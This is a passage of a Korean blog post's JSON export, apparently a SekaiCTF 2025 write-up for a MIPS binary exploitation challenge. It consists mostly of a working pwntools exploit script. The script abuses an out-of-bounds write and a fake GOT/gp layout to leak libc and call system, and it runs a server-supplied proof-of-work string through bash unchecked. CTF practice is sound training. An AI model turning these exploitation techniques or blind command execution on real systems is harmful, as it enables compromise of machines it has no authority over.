class=\"wp-block-heading\"><a href=\"http:\/\/solve.py\">solve.py<\/a> (server)<\/h2>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#!\/usr\/bin\/env python3\n\nfrom pwn import *\ncontext.log_level = 'debug'\ncontext(arch='mips', os='linux', bits=32, endian='little')\nwarnings.filterwarnings('ignore')\nimport sys\n\n# p = remote(\"127.0.0.1\", 1337)\n# p = process(\".\/run2_dbg.sh\")\n# p = process(\".\/run2.sh\")\np = remote(\"outdated-boecxic4xpz8.chals.sekai.team\", 1337, ssl=True)\n\ne = ELF('.\/outdated',checksec=False)\n# l = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\nl = ELF('.\/target\/lib\/libc.so', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\nru(\"proof of work: \")\ncmd = rl()\ninfo(f\"cmd: {cmd}\")\n\nproc = subprocess.run(\n    [\"bash\", \"-c\", cmd],\n    stdout=subprocess.PIPE,\n    stderr=subprocess.PIPE,\n    text=True,        # \uacb0\uacfc\ub97c str \ub85c \ubc1b\uae30 \uc704\ud568\n    check=True        # \uc5d0\ub7ec \uc2dc \uc608\uc678 \ubc1c\uc0dd\n)\n\nanswer = proc.stdout.strip()\n\ninfo(f\"answer: {answer}\")\n\nsl(answer)\n\nru(b\"Here's a little bit of helpful information:\")\nleak = rl().strip()\nleak = int(leak, 16)\ninfo(f\"leak: {hex(leak)}\")\n\ne.address = leak - e.sym.main\npie_base = e.address\ninfo(f\"pie_base: {hex(e.address)}\")\n\n# pay = p32(e.sym.main + 0x1f0)\n# pay += b\"ABCDEFGHIJKL\"\n# pay += p32(e.sym.exit) + b\"QRSTUVWXYZabcdefghijk;lmnopqrstuvwxyz0123456789\"\n# pay = pay + b\"\\\\x41\"*(0x5f-len(pay))\n\n# guessed_libc_base = pie_base - 0x8f4000 # = 0x3f70c000\n# info(f\"guessed_libc_base: {hex(guessed_libc_base)}\")\n# l.address = guessed_libc_base\n\n# pay = b\"A\"*0x5f\n#fake gp!!!! fake got!!!!\npay = p32(e.got.puts - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(e.sym.puts_blue)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(e.sym.puts_blue)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   #__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\n'''\n.got:00020010  # ===========================================================================\n.got:00020010\n.got:00020010  # Segment type: Pure data\n.got:00020010                 .data # .got\n.got:00020010 off_20010:      .word _stdout            # DATA XREF: sub_6F0\u2191o\n.got:00020010                                          # sub_740\u2191o ...\n.got:00020014                 .word 0x80000000\n.got:00020018 _term_proc_ptr: .word _term_proc\n.got:0002001C _init_proc_ptr: .word _init_proc\n.got:00020020 main_ptr:       .word main\n.got:00020024                 .word unk_20004\n.got:00020028 __RLD_MAP_ptr:  .word __RLD_MAP\n.got:0002002C                 .word off_20090\n.got:00020030                 .word _stdout   &lt;- string by puts\n.got:00020034 puts_blue_ptr:  .word puts_blue &lt;- fake gp start !!!!!!!!!!!!!! fake_gp = 0x200c0 \n.got:00020038 game_name_ptr:  .word game_name\n.got:0002003C                 .word _stdout\n.got:00020040                 .word _stdout\n.got:00020044                 .word _stdout\n.got:00020048 __register_frame_info_ptr:.word __register_frame_info\n.got:0002004C __libc_start_main_ptr:.word __libc_start_main\n.got:00020050 setbuf_ptr:     .word setbuf\n.got:00020054 exit_ptr:       .word exit !!!!!!!!!!!!!\n                                        exit \ub300\uc2e0\uc5d0 main \ub4e4\uc5b4\uac00\uac8c \ub9cc\ub4dc\ub294\uac74 \uc26c\uc6c0, \uc790\uccb4\uc801\uc73c\ub85c write\ud558\uba74 \ub418\ub2c8\uae4c ... +0x10\ud558\uba74 _ITM_deregisterTMCloneTable?\n                                        \uc2e4\uc81c\ub85c \uc27d\uc9c0 \uc54a\uc74c;; -0x34 \ub610\ub294 game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30 \uc704\ud574 \ucd5c\uc18c +0x6c \uc774\uc0c1\n.got:00020058 stderr_ptr:     .word stderr\n.got:0002005C scanf_ptr:      .word scanf\n.got:00020060 strcspn_ptr:    .word strcspn\n.got:00020064 _ITM_deregisterTMCloneTable_ptr:.word _ITM_deregisterTMCloneTable \n.got:00020068 stdin_ptr:      .word stdin\n.got:0002006C _ITM_registerTMCloneTable_ptr:.word _ITM_registerTMCloneTable\n.got:00020070 __deregister_frame_info_ptr:.word __deregister_frame_info\n.got:00020074 __stack_chk_fail_ptr:.word __stack_chk_fail\n.got:00020078 __cxa_finalize_ptr:.word __cxa_finalize\n.got:0002007C puts_ptr:       .word puts  !!!!!!!! puts \ub300\uc2e0\uc5d0 main\uc5d0 \ub4e4\uc5b4\uac00\ub824\uba74... -0x5c\ud574\uc11c got\uc758 main \uac00\ub9ac\ud0a4\uac70\ub098, \ub610\ub294 +0x44\ud574\uc11c game_name\uae4c\uc9c0 \ub2e4\ub2e4\ub974\uae30\n                                            puts \ub300\uc2e0\uc5d0 printf \ub4e4\uc5b4\uac00\ub824\uba74,,,+0x10 \ub354\ud574\uc57c\ud568;; 2007c-0x34 = 20048; __register_frame_info\n                                            puts \ub300\uc2e0\uc5d0 puts_blue \ub4e4\uc5b4\uac00\ub824\uba74, \n.got:00020080 fgets_ptr:      .word fgets   \n.got:00020084 __stack_chk_guard_ptr:.word __stack_chk_guard\n.got:00020088 stdout_ptr:     .word stdout\n.got:0002008C printf_ptr:     .word printf\n.got:0002008C\n.sdata:00020090  # ===========================================================================\n.sdata:00020090\n.sdata:00020090  # Segment type: Pure data\n.sdata:00020090                 .sdata\n.sdata:00020090 off_20090:      .word off_20090          # DATA XREF: sub_7B4+30\u2191o\n.sdata:00020090                                          # sub_7B4+3C\u2191r ...\n.sdata:00020090\nLOAD:00020094  # ===========================================================================\nLOAD:00020094\nLOAD:00020094  # Segment type: Pure data\nLOAD:00020094                 .data # LOAD\nLOAD:00020094                 .align 4\nLOAD:00020094\n.bss:000200A0  # ===========================================================================\n.bss:000200A0\n.bss:000200A0  # Segment type: Uninitialized\n.bss:000200A0                 .bss\n.bss:000200A0 dword_200A0:    .space 4                 # DATA XREF: sub_7B4+20\u2191r\n.bss:000200A0                                          # sub_7B4+70\u2191w\n.bss:000200A4 dword_200A4:    .space 4                 # DATA XREF: sub_838+2C\u2191o\n.bss:000200A8                 .space 4\n.bss:000200AC                 .space 4\n.bss:000200B0                 .space 4\n.bss:000200B4                 .space 4\n.bss:000200B8                 .space 4\n.bss:000200BC                 .space 4\n.bss:000200C0                 .globl game_name\n.bss:000200C0  # _BYTE game_name[96]\n.bss:000200C0 game_name:      .space 0x60              # DATA XREF: LOAD:000003D8\u2191o\n'''\n\n# LEAK TEST!!!!!!!\n# # ru(\"your game\")\n# # rl()\n# leak = ru(\".\\\\n\")\n# leak = rl()\n# # leak = r(4)\n# # leak = leak[3:3+4]\n# # leak = uu32(leak)\n# info(f\"leak: {(leak.hex())}\")\n# info(f\"leak: {(hex(leak))}\")\n# # l.address = leak - l.sym.stderr\n# # success(f\"libc_base: {(hex(l.address))}\")\n# p.close()\n\n# ru(\"your game\")\n# rl()\nleak = ru(\".\\\\n\")\nleak = rl()\n# leak = r(4)\nleak = leak[5:5+4]\nleak = uu32(leak)\n# info(f\"leak: {(leak.hex())}\")\ninfo(f\"leak: {(hex(leak))}\")\nl.address = leak - l.sym.puts\nsuccess(f\"libc_base: {(hex(l.address))}\")\n\n#main again\n#fake gp!!!! fake got!!!!\npay = p32(l.address + 0xAAF20 - 0x118c) #.got:40020030                 .word _stdout            # string by puts\npay += p32(l.sym.system)     #puts_blue\npay += p32(0)    #game_name\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #_stdout... dummy?\npay += p32(0)    #__register_frame_info_ptr... dummy?\npay += p32(0)    #__libc_start_main_ptr\npay += p32(0)   #setbuf\npay += p32(e.sym.main)   #exit_ptr\npay += p32(0)   #stderr_ptr\npay += p32(0)   #scanf_ptr\npay += p32(0)   #strcspn_ptr\npay += p32(0)   #_ITM_deregisterTMCloneTable_ptr\npay += p32(0)   #stdin_ptr\npay += p32(0)   #_ITM_registerTMCloneTable_ptr\npay += p32(0)   #__deregister_frame_info_ptr\npay += p32(0)   #__stack_chk_fail_ptr\npay += p32(0)   #__cxa_finalize_ptr\npay += p32(l.sym.system)   #puts_ptr x: 0xab4~0xab0-4*5\npay += p32(0)   #fgets_ptr\npay += p32(0)   #__stack_chk_guard_ptr\npay += p32(0)   #stdout_ptr\n# pay += p32(l.sym.system)   #printf_ptr\n\nsla(b\"What would you like to name your game?\\\\n\", pay)\n\npay = str(-12) #\uc2a4\ud0dd \ud504\ub808\uc784\uc5d0 \uc788\ub294 gp \ud558\uc7044\ubc14\uc774\ud2b8 \uc218\uc815\n# pay = str(int((e.got.puts\/2)-0x40))\n# pay = str(0x41414141) #32\ube44\ud2b8 \uc815\uc218\nsla(\"Which level do you want to change?\\\\n\", pay)\n\npay = str(0x8000+0x4*(17+19)) #16\ube44\ud2b8 \uc815\uc218\nsla(\"What reward do you want to set for this level?\\\\n\", pay)\n\npi()\n<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Result<\/h2>\n\n\n\n<p><strong><code>SEKAI{!'VE-dUBB3D_+hI$-73(HN1QUE-\"9P-*VERWR17E\"}<\/code><\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-1024x576.png\" alt=\"\" class=\"wp-image-3925\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-1024x576.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-300x169.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-768x432.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2-1536x864.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/08\/image-2.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>checksec Decompiled-src \/ Analysis \ucf54\ub4dc\ub85c \uc54c\uc544\ubcf4\uae30 \ud798\ub4e4\uae30 \ub54c\ubb38\uc5d0 ghidra\ub97c \ud65c\uc6a9\ud558\uac70\ub098 \uc5b4\uc148\ube14\ub9ac\uc5b4 \ucf54\ub4dc\ub85c \ubcf4\ub294\uac8c \ub0ab\ub2e4. \uadf8\ub098\ub9c8 \uc54c\uc544\ubcf4\uae30 \uc27d\ub2e4. \ud558\uc9c0\ub9cc \ub9e4\uac1c\ubcc0\uc218\ub294 \uc81c\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uc9c4 \uc54a\ub294\ub2e4. \ubd84\uc11d\ud558\uae30 \uc88b\ub2e4. \ucde8\uc57d\uc810\uae4c\uc9c0 \uc54c\ub824\uc8fc\ub294 \uc0c1\ud669\uc774\ub2e4. \ubcf4\ub2e4\uc2dc\ud53c main \ud568\uc218 \uc8fc\uc18c\ub97c \ucd9c\ub825\ud574\uc8fc\uace0, game_name \uc804\uc5ed\ubc30\uc5f4\uc5d0 95\ubc14\uc774\ud2b8\ub9cc\ud07c \uc785\ub825\ubc1b\uc744 \uc218 \uc788\ub2e4. level_rewards \uc9c0\uc5ed\ubc30\uc5f4\uc5d0\uc11c OOB write \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud558\uba70, level_index\ub97c \ud1b5\ud574 \uc4f0\uc5ec\uc9c8 \ub300\uc0c1 \uc8fc\uc18c, new_reward\ub85c \uc4f8 \uac12 2\ubc14\uc774\ud2b8\ub97c \uc815\ud560 \uc218&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3923\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[SekaiCTF2025] outdated (mips)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[79,25],"class_list":["post-3923","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-mips","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3923","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3923"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3923\/revisions"}],"predecessor-version":[{"id":3926,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3923\/revisions\/3926"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3923"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3923"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3923"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}